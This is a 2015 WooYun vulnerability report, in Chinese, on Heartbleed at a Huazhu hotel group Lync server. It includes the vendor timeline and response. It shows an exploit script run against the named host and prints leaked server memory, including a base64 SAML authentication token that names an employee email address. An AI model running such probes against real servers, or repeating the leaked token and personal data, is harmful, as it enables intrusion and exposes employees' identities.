当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090041

漏洞标题:华住某站心脏滴血导致大量员工邮箱地址信息泄露

相关厂商:汉庭酒店

漏洞作者: 杀器王子

提交时间:2015-01-05 12:42

修复时间:2015-02-19 12:44

公开时间:2015-02-19 12:44

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-05: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向核心白帽子及相关领域专家公开
2015-01-25: 细节向普通白帽子公开
2015-02-04: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

滴呀滴

详细说明:

lync.huazhu.com心脏滴血

python OpenSSL.py         
input IP:lync.huazhu.com
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
WARNING: server returned more data than it should - server is vulnerable!
@SC[r+H9w3f"!98532ED/AI42#0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2251.0 Safari/537.36Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4|j{!v0mxvYzo0NDQzL2I1YWFkNWRhLWIxN2QtNTc4MS05NjAwLTZlMTFhNzhiMGI2NCIgSXNzdWVJbnN0YW50PSIyMDE1LTAxLTA1VDAzOjE3OjUyLjEyN1oiIHhtbG5zOnNhbWw9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMDphc3NlcnRpb24iPjxzYW1sOkNvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDE1LTAxLTA1VDAzOjE3OjUyLjEyNloiIE5vdE9uT3JBZnRlcj0iMjAxNS0wMS0wNVQxMTowNjoxMS4xMjZaIj48c2FtbDpBdWRpZW5jZVJlc3RyaWN0aW9uQ29uZGl0aW9uPjxzYW1sOkF1ZGllbmNlPmh0dHBzOi8vbHluYy5odWF6aHUuY29tLzwvc2FtbDpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbkNvbmRpdGlvbj48L3NhbWw6Q29uZGl0aW9ucz48c2FtbDpBdXRoZW50aWNhdGlvblN0YXRlbWVudCBBdXRoZW50aWNhdGlvbk1ldGhvZD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6MS4wOmFtOnVuc3BlY2lmaWVkIiBBdXRoZW50aWNhdGlvbkluc3RhbnQ9IjIwMTUtMDEtMDVUMDM6MTc6NTIuMTI3WiI+PHNhbWw6U3ViamVjdD48c2FtbDpOYW1lSWRlbnRpZmllciBGb3JtYXQ9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDUvaWRlbnRpdHkvY2xhaW1zL3VyaSI+c2lwOnlvdWh1aXhAaHVhemh1LmNvbTwvc2FtbDpOYW1lSWRlbnRpZmllcj48c2FtbDpTdWJqZWN0Q29uZmlybWF0aW9uPjxzYW1sOkNvbmZpcm1hdGlvbk1ldGhvZD51cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoxLjA6Y206aG9sZGVyLW9mLWtleTwvc2FtbDpDb25maXJtYXRpb25NZXRob2Q+PEtleUluZm8geG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxlOkVuY3J5cHRlZEtleSB4bWxuczplPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyMiPjxlOkVuY3J5cHRpb25NZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyNrdy1hZXMyNTYiPjwvZTpFbmNyeXB0aW9uTWV0aG9kPjxLZXlJbmZvPjxLZXlOYW1lPmI1YWFkNWRhLWIxN2QtNTc4MS05NjAwLTZlMTFhNzhiMGI2NDo4ZDFmNmE0MDVmNTQxOGU8L0tleU5hbWU+PC9LZXlJbmZvPjxlOkNpcGhlckRhdGE+PGU6Q2lwaGVyVmFsdWU+V0I5akcvRTBvOTJueEFKM1NndnRhd001QzNHT3laRm5NcWxwK1lvK3R2TGV5ZHlpOXU2bkx3PT08L2U6Q2lwaGVyVmFsdWU+PC9lOkNpcGhlckRhdGE+PC9lOkVuY3J5cHRlZEtleT48L0tleUluZm8+PC9zYW1sOlN1YmplY3RDb25maXJtYXRpb24+PC9zYW1sOlN1YmplY3Q+PC9zYW1sOkF1dGhlbnRpY2F0aW9uU3RhdGVtZW50PjxTaWduYXR1cmUgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiPjxTaWduZWRJbmZvPjxDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIj48L0Nhbm9uaWNhbGl6YXRpb25NZXRob2Q+PFNpZ25hdHVyZU1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNyc2Etc2hhMSI+PC9TaWduYXR1cmVNZXRob2Q+PFJlZmVyZW5jZSBVUkk9IiNTYW1sU2VjdXJpdHlUb2tlbi0yMDFiY2E4Ny0wNDFhLTRkNDYtYTkxZS03ODRjOGNhMGYxMzUiPjxUcmFuc2Zvcm1zPjxUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjZW52ZWxvcGVkLXNpZ25hdHVyZSI+PC9UcmFuc2Zvcm0+PFRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyI+PC9UcmFuc2Zvcm0+PC9UcmFuc2Zvcm1zPjxEaWdlc3RNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzA0L3htbGVuYyNzaGEyNTYiPjwvRGlnZXN0TWV0aG9kPjxEaWdlc3RWYWx1ZT53bk9wbXV6bVpZeHhWaUFrYmFYTzNZakpxMFc5bzFCRCs5YnpxR0NMNEpvPTwvRGlnZXN0VmFsdWU+PC9SZWZlcmVuY2U+PC9TaWduZWRJbmZvPjxTaWduYXR1cmVWYWx1ZT5UczBVbWFSTG9FaHZVVUZ5eEtWRHVLdytUMXM5SzVZNnVSNmNNdjhxaXlBWnVGbUliR1hXNDY4M0g2V3lGR2pFbXhVb0tmdm1UT1hzbG8wcVpUWXc0MEFTczltUG5UbXdOZDBwZ3c3S1c5Z1gxSFVuOHJnSkJYRnhhak4yNm1rMk1SODV3eEgrVWRIT1Z2YUwvWktoUThNVHlwZGtDV0h4QmZDZmlPbC9xZjhEU3dOMHhVYldkVTdsbUxKQUNuUE94YUw1OHpqYzFCODkya3lVWlQrazkwOG9zb3RSZ3BPQVkvTTZCZGJXY3pHcmltTWRRbjc5cjgzQTN6VHhHcU91YWtyZmgxblJoeDFJQkJ0cTFWU0hvZkMyL3MrVjJ1dnlwbTRTbm9JbnpBOGhxMWtjaEFEZ0dSNFgwL2N5UWtrQTh0MmhlZ252bDRnZTBC


漏洞证明:

大量内部员工邮箱地址泄露

huazhu.jpg

修复方案:

打补丁

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-05 16:04

厂商回复:

谢谢关注,该问题己移交相关团队处理。

最新状态:

暂无